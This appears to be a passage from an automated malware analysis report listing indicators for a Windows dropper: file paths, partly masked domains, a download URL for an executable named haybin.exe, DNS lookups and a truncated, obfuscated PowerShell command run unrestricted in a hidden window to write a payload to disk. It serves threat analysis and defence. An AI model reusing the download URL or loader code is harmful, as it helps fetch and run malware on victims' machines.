Technical Information
- %WINDIR%\explorer.exe
- %WINDIR%\syswow64\netbtugc.exe
- %APPDATA%\haybin.exe
- 'mu###egra.it':80
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
- http://mu###egra.it/wp-admin/js/widgets/haybin.exe
- DNS ASK mu###egra.it
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- '%APPDATA%\haybin.exe'
- '%WINDIR%\syswow64\netbtugc.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function dqVFfd($SIPBSCCQ, $CKajadcg){[IO.File]::WriteAllBytes($SIPBSCCQ, $CKajadcg)};function FUxvmWFXwa($SIPBSCCQ){if($SIPBSCCQ.EndsWith((DRxRyuHRBMKq @(33850,33...' (with hidden window)